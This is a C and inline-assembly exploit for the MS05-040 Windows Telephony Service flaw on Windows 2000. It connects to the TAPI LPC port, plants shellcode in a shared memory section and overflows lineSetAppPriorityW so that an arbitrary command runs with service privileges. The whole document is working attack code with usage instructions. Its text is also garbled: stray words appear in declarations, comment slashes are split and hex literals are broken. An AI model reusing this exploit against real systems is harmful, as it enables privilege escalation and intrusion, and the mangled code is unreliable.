MS Windows Telephony Service Command Execution Exploit (MS05-040)

/ / TAPI Vulnerability-MS05-040
/ /
/ / Should work on Win2k sp0, sp1, sp2, sp3, sp4 any language
/ / If Telephony Service is not running you can start it by net start “Telephony Service”
# Include “windows.h”
# Include “stdio.h”
# Include “tapi.h
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING;
typedef struct LpcSectionMapInfo {
DWORD Length;
DWORD SectionSize;
DWORD ServerBaseAddress;
} LPCSECTIONMAPINFO;
typedef struct LpcSectionInfo {
DWORD Length;
HANDLE SectionHandle;
DWORD Param1;
DWORD SectionSize;
DWORD clientBaseAddress;
DWORD ServerBaseAddress;
} LPCSECTIONINFO;
# Define SHARED_SECTION_SIZE 0x1000
typedef struct _OBJDIR_INFORMATION {
UNICODE_STRING ObjectName;
UNICODE_STRING ObjectTypeName;
The Byte is Data [1];
} OBJDIR_INFORMATION;
typedef struct _OBJECT_ATTRIBUTES is {
ULONG Length;
The HANDLE RootDirectory;
UNICODE_STRING * ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES;
# Define InitializeObjectAttributes (p, n, a, r, s) {/
(P) -> Length = sizeof (OBJECT_ATTRIBUTES); /
(P) -> RootDirectory = r; /
(P) -> Attributes = a; /
(P) -> ObjectName = n; /
(P) -> SecurityDescriptor = s; /
(P) -> SecurityQualityOfService = NULL; /
}
Wchar * ustring = (WCHAR *) HeapAlloc (GetProcessHeap (,), 0, 0x100);
LPVOID lpLocalAddress, lpTargetAddress;
The DWORD ConnectToLPCPort () {
The hModule hNtdll;
The HANDLE hPort;
LPCSECTIONINFO sectionInfo;
LPCSECTIONMAPINFO mapInfo;
the byte ConnectDataBuffer [100];
DWORD Size = sizeof (ConnectDataBuffer);
WCHAR * uString = L “/ / RPC Control / / tapsrvlpc” ;/ / TAPI LPC port
DWORD i;
UNICODE_STRING USTR;
for (i = 0; i <100; i + +)
ConnectDataBuffer [i] = 0x0;
hNtdll = LoadLibrary (“ntdll.dll”);
DWORD (WINAPI * pfnNtConnectPort) (HANDLE *, UNICODE_STRING *, SECURITY_QUALITY_OF_SERVICE *, DWORD *, DWORD *, DWORD *, DWORD *, DWORD *);
pfnNtConnectPort = (DWORD (WINAPI *) (HANDLE *, UNICODE_STRING *, SECURITY_QUALITY_OF_SERVICE *, DWORD *, DWORD *, DWORD *, DWORD *, DWORD *)) GetProcAddress (hNtdll, “NtConnectPort”);
DWORD (WINAPI * pfnCreateSection) (HANDLE *, DWORD, DWORD, PLARGE_INTEGER, DWORD, DWORD, DWORD);
pfnCreateSection = (DWORD (WINAPI *) (HANDLE *, DWORD, DWORD, PLARGE_INTEGER, DWORD, DWORD, DWORD)) GetProcAddress (hNtdll, “NtCreateSection”);
The HANDLE hSection;
LARGE_INTEGER SecSize;
DWORD maxSize = 0;
SecSize.LowPart = 0x1000;
SecSize.HighPart = 0x0;
The QoS SECURITY_QUALITY_OF_SERVICE;
DWORD qosSize of = 4;
qos.Length = (DWORD) &qosSize;
qos.ImpersonationLevel = (_SECURITY_IMPERSONATION_LEVEL) 0x2;
qos.ContextTrackingMode = 0x01000101;
qos.EffectiveOnly = 0x10000;
/ / Create shared section
pfnCreateSection (& hSection, SECTION_ALL_ACCESS, NULL, & SecSize, PAGE_READWRITE, SEC_COMMIT, NULL);
memset (& sectionInfo, 0, sizeof (sectionInfo));
memset (& mapInfo, 0, sizeof (mapInfo));
sectionInfo.Length = 0x18;
sectionInfo.SectionHandle = hSection;
sectionInfo.SectionSize = SHARED_SECTION_SIZE;
mapInfo.Length = 0x0C;
uStr.Length = wcslen (uString) * 2;
uStr.MaximumLength = wcslen (uString) * 2 +2;
uStr.Buffer = uString;
/ / Connect to LPC port
if (! pfnNtConnectPort (& hPort, & uStr, & qos, (DWORD *) & sectionInfo, (DWORD *) & mapInfo, & maxSize, (DWORD *) ConnectDataBuffer, & Size)) {
lpLocalAddress = (LPVOID) sectionInfo.ClientBaseAddress;
lpTargetAddress = (LPVOID) sectionInfo.ServerBaseAddress;
return 1;
}
return 0;
}
int main (int argc, char * argv [])
{
The hModule hKernel;
DWORD iStrLen;
FARPROC pWinExec, pExitThread;
The LPSTR sCommand;
if (! argv [1]) {
printf (“/ nUsage :/ n TapiExploit /” command / “/ n”);
printf (“/ nExample :/ n TapiExploit /” cmd.exe / “/ n”);
exit (0);
}
iStrLen = strlen (argv [1]);
if (iStrLen> = 65) {
printf (“/ n /” command / “must be less than 65 chars. / n”);
exit (0);
}
sCommand = argv [1];
if (! ConnectToLPCPort ()) {/ / connect to TAPI LPC port
printf (“Could not connect to LPC port / nTAPI service couldn’t be running / nTry again.”);
exit (0);
}
hKernel = LoadLibrary (“Kernel32.dll”);
/ / PWinExec = GetProcAddress (hKernel, “WinExec”);
pWinExec = GetProcAddress (hKernel, “CreateProcessA”);
pExitThread = GetProcAddress (hKernel, “ExitThread”);
CHAR sWinSta [] = “WinSta0 / / Default”;
/ / Copy the shellcode
_asm {
pushad
lea esi, Shellcode
mov edi, lpLocalAddress
add edi, 0x10
lea ecx, End
sub ecx, esi
push esi
push edi
cld
rep movsb
pop edi
pop esi
push edi
lea ecx, CommandBuf
sub ecx, esi
add edi, ecx
mov esi, sCommand
mov ecx, iStrLen
rep movsb
mov [edi], 0x00
pop edi
mov esi, pWinExec
mov [edi +0 x0a], esi
mov esi, pExitThread
mov [edi +0 x0e], esi
/ / / / / / / / / / / / / /
add edi, 0x2f0
lea esi, sWinSta
mov ecx, 0xf
cld
rep movsb
/ / / / / / / / / / / / / / /
jmp DoneShellcode:
jmp Start
/ / This gets overwritten
mov ax, 0xffff
mov ax, 0xffff
mov ax, 0xffff
mov ax, 0xffff
CommandBuf: / / this gets overwritten
mov dword ptr [eax], 0x55555555
mov dword ptr [eax], 0x55555555
mov dword ptr [eax], 0x55555555
mov dword ptr [eax], 0x55555555
mov dword ptr [eax], 0x55555555
mov dword ptr [eax], 0x55555555
mov dword ptr [eax], 0x55555555
mov dword ptr [eax], 0x55555555
mov dword ptr [eax], 0x55555555
mov dword ptr [eax], 0x55555555
mov dword ptr [eax], 0x55555555
Start:
call getDelta,
getDelta:
pop edx / / Get shellcode / shared section pointer
push edx

/ * Push 0x1 / / push 0x0 for hidden window
lea eax, [edx-0x47]
push eax / / Command offset
call [edx-0x4f] / / Call WinExec
* /

mov eax, edx
add eax, 0x500

push eax / / LPPROCESS_INFORMATION
add eax, 0x100
mov ebx, edx
xor bl, bl
lea ecx, [ebx +0 x300]
lea ebx, [eax +0 x8]
mov [ebx], ecx / / set windows station and desktop
push eax / / LPSTARTUPINFO
push 0x0
push 0x0
push 0x0
push 0x0
push 0x0
push 0x0

lea eax, [edx-0x47]
push eax / / Command offset
push 0x0
call [edx-0x4f] / / Call create process
pop edx
call [edx-0x4b] / / Call ExitThread
End:
Done:
popad
}
LPSTR lpszAppFilename = (LPSTR) HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, 0x21C);
LINEEXTENSIONID ExtensionID;
memset (lpszAppFilename, 0x58, 0x21A);
_asm {
pushad
mov ebx, lpszAppFilename
lea ebx, [ebx +0 x216]
mov eax, lpTargetAddress
add eax, 0x10
mov [ebx], EAX
popad
}
lineSetAppPriorityW ((LPWSTR) lpszAppFilename, NULL, & ExtensionID, LINEREQUESTMODE_MAKECALL, NULL, NULL);
Sleep (1000);
printf (“Command should have been executed 😉 / n”);
return 0;
}